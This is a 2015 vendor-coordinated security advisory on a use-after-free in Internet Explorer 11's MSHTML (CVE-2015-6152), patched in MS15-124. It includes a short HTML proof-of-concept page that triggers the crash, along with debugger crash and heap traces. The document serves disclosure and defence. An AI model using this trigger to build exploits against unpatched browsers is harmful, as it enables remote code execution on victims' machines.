Blue Frost Security GmbH https://www.bluefrostsecurity.de/ research(at)bluefrostsecurity.de BFS-SA-2015-003 10-December-2015 ________________________________________________________________________________ Vendor: Microsoft, http://www.microsoft.com Affected Products: Internet Explorer Affected Version: IE 11 Vulnerability: MSHTML!CObjectElement Use-After-Free Vulnerability CVE ID: CVE-2015-6152 ________________________________________________________________________________ I. Impact This vulnerability allows the execution of arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. ________________________________________________________________________________ II. Vulnerability Details Microsoft Internet Explorer 11 is prone to a use-after-free vulnerability in the MSHTML!CTreeNode::ComputeFormatsHelper function. The analysis was performed on Internet Explorer 11 running on Windows 7 SP1 (x64). The following HTML page can be used to reproduce the issue: <!DOCTYPE HTML> <html> <meta http-equiv="X-UA-Compatible" content="IE=8" /> <style> small{ -ms-block-progression: lr; -ms-filter: "vv"; } </style> <script> function trigger() { document.execCommand("JustifyLeft"); } </script> <nolayer>blue<small>frost</small> <applet><tt>security</applet> <script>trigger();</script> </html> With page heap enabled and the Memory Protect feature turned off, visiting that page results in the following crash: (2d4.830): Access violation - code c0000005 (!!! second chance !!!) eax=09b09e90 ebx=125b4e60 ecx=00000000 edx=6e9fedf0 esi=0f552fa0 edi=0f552fa0 eip=6dfcc19b esp=097fb520 ebp=097fc1f0 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 MSHTML!CTreeNode::ComputeFormatsHelper+0x53: 6dfcc19b f7402400000300 test dword ptr [eax+24h],30000h ds:002b:09b09eb4=???????? 0:007> !heap -p -a @eax address 09b09e90 found in _DPH_HEAP_ROOT @ 9b01000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) 9b01f04: 9b09000 2000 748090b2 verifier!AVrfDebugPageHeapFree+0x000000c2 77e61b1c ntdll!RtlDebugFreeHeap+0x0000002f 77e1ae8a ntdll!RtlpFreeHeap+0x0000005d 77dc2b65 ntdll!RtlFreeHeap+0x00000142 758814ad kernel32!HeapFree+0x00000014 6d92d219 MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x00000122 6dc46583 MSHTML!CObjectElement::`vector deleting destructor'+0x00000023 6dfce0db MSHTML!CElement::PrivateRelease+0x0000027e 6d98953d MSHTML!CObjectElement::DeferredFallback+0x0000033d 6d96e1b3 MSHTML!GlobalWndOnMethodCall+0x0000017b 6d95577e MSHTML!GlobalWndProc+0x0000012e 770762fa user32!InternalCallWinProc+0x00000023 77076d3a user32!UserCallWinProcCheckWow+0x00000109 770777c4 user32!DispatchMessageWorker+0x000003bc 7707788a user32!DispatchMessageW+0x0000000f 6ebfa7b8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464 6ec38de8 IEFRAME!LCIETab_ThreadProc+0x000003e7 76a9e81c iertutil!CMemBlockRegistrar::_LoadProcs+0x00000067 747b4b01 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094 7588336a kernel32!BaseThreadInitThunk+0x0000000e 77dc9882 ntdll!__RtlUserThreadStart+0x00000070 77dc9855 ntdll!_RtlUserThreadStart+0x0000001b We can see that a freed CObjectElement object is accessed in the MSHTML!CTreeNode::ComputeFormatsHelper function. If we take a look at the memory just before the CObjectElement destructor is called, we can see where the object was initially allocated. 0:007> bu MSHTML!CObjectElement::~CObjectElement 0:007> g Breakpoint 0 hit eax=6daf6b10 ebx=00000000 ecx=0980de90 edx=0f834bb0 esi=0980de90 edi=094bc324 eip=6dc4658f esp=094bc310 ebp=094bc318 iopl=0 nv up ei ng nz na pe cy cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000287 MSHTML!CObjectElement::~CObjectElement: 0:007> !heap -p -a poi(@esp+4) address 09b09e90 found in _DPH_HEAP_ROOT @ 9b01000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 9b01f04: 9b09e90 170 - 9b09000 2000 MSHTML!CObjectElement::`vftable' 74808e89 verifier!AVrfDebugPageHeapAllocate+0x00000229 77e6134e ntdll!RtlDebugAllocateHeap+0x00000030 77e1b16e ntdll!RtlpAllocateHeap+0x000000c4 77dc2fe3 ntdll!RtlAllocateHeap+0x0000023a 6daf6a27 MSHTML!CObjectElement::CreateElement+0x00000017 6e0423a4 MSHTML!CHtmParse::ParseBeginTag+0x000000b8 6df17172 MSHTML!CHtmParse::ParseToken+0x00000096 6df16a0f MSHTML!CHtmPost::ProcessTokens+0x000004c7 6dd8341b MSHTML!CHtmPost::Exec+0x00000207 6da308a8 MSHTML!CHtmPost::Run+0x0000003d 6da3080e MSHTML!PostManExecute+0x00000061 6da2727c MSHTML!PostManResume+0x0000007b 6da971f0 MSHTML!CDwnChan::OnMethodCall+0x0000002f 6d96e1b3 MSHTML!GlobalWndOnMethodCall+0x0000017b 6d95577e MSHTML!GlobalWndProc+0x0000012e 770762fa user32!InternalCallWinProc+0x00000023 77076d3a user32!UserCallWinProcCheckWow+0x00000109 770777c4 user32!DispatchMessageWorker+0x000003bc 7707788a user32!DispatchMessageW+0x0000000f 6ebfa7b8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464 6ec38de8 IEFRAME!LCIETab_ThreadProc+0x000003e7 76a9e81c iertutil!CMemBlockRegistrar::_LoadProcs+0x00000067 747b4b01 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094 7588336a kernel32!BaseThreadInitThunk+0x0000000e 77dc9882 ntdll!__RtlUserThreadStart+0x00000070 77dc9855 ntdll!_RtlUserThreadStart+0x0000001b ________________________________________________________________________________ III. Mitigation The issue was fixed in MS15-124 which should be installed to resolve the issue. ________________________________________________________________________________ IV. Disclosure Timeline - 2015-08-04 Vulnerability reported to secure@xxxxxxxxxxxxx - 2015-09-24 Microsoft confirms that they successufully reproduced the issue - 2015-12-08 Microsoft resolves issue in MS15-124 ________________________________________________________________________________ Credit: Bug found by Moritz Jodeit of Blue Frost Security GmbH. ________________________________________________________________________________ Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact research@xxxxxxxxxxxxxxxxxxxx for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall Blue Frost Security be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Blue Frost Security has been advised of the possibility of such damages. Copyright 2015 Blue Frost Security GmbH. All rights reserved. Terms of use apply.